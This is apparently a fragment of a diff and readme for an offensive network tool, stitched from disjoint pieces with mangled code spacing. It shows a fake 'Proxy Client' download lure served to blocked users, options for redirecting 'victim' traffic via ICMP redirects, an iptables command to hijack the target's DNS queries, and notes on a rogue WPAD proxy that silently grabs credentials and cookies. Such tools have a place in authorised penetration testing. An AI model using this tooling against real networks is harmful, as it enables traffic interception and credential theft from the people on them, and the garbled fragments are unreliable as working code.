<li><b>Access has been blocked. Please download and install the new </b><spanclass="url"><ahref="http://isaProxysrv/ProxyClient.exe"><b>Proxy Client</b></a></span><b> in order to access internet resources.</b></li>

parser.add_option('-r','--route',action="store",help="The ip address of the destination target, example: DNS server. Must be on another subnet.",metavar="10.20.40.1",dest="ToThisHost")

parser.add_option('-s','--secondaryroute',action="store",help="The ip address of the destination target, example: Secondary DNS server. Must be on another subnet.",metavar="10.20.40.1",dest="ToThisHost2")

parser.add_option('-I','--interface',action="store",help="Interface name to use, example: eth0",metavar="eth0",dest="Interface")

parser.add_option('-a','--alternate',action="store",help="The alternate gateway, set this option if you wish to redirect the victim traffic to another host than yours",metavar="10.20.30.40",dest="AlternateGwAddr")

...

...

@@ -71,6 +76,7 @@ OriginalGwAddr = options.OriginalGwAddr

AlternateGwAddr=options.AlternateGwAddr

VictimIP=options.VictimIP

ToThisHost=options.ToThisHost

ToThisHost2=options.ToThisHost2

Interface=options.Interface

defShow_Help(ExtraHelpData):

...

...

@@ -80,8 +86,6 @@ def Show_Help(ExtraHelpData):

MoreHelp="Note that if the target is Windows, the poisoning will only last for 10mn, you can re-poison the target by launching this utility again\nIf you wish to respond to the traffic, for example DNS queries your target issues, launch this command as root:\n\niptables -A OUTPUT -p ICMP -j DROP && iptables -t nat -A PREROUTING -p udp --dst %s --dport 53 -j DNAT --to-destination %s:53\n\n"%(ToThisHost,OURIP)

Show_Help(MoreHelp)

classPacket():

fields=OrderedDict([

("data",""),

...

...

@@ -218,7 +222,7 @@ def ReceiveArpFrame(DstAddr):

print"[ARP]%s took too long to Respond. Please provide a valid host.\n"%(DstAddr)

- Icmp Redirect for MITM on Windows XP/2003 and earlier Domain members. This attack combined with

the DNS module is pretty effective.

- WPAD rogue transparent proxy server. This module will *silently* grab the encrypted credentials of anyone launching Internet Explorer on the network. It will also grab the cookie of the requested page. This module is higly effective.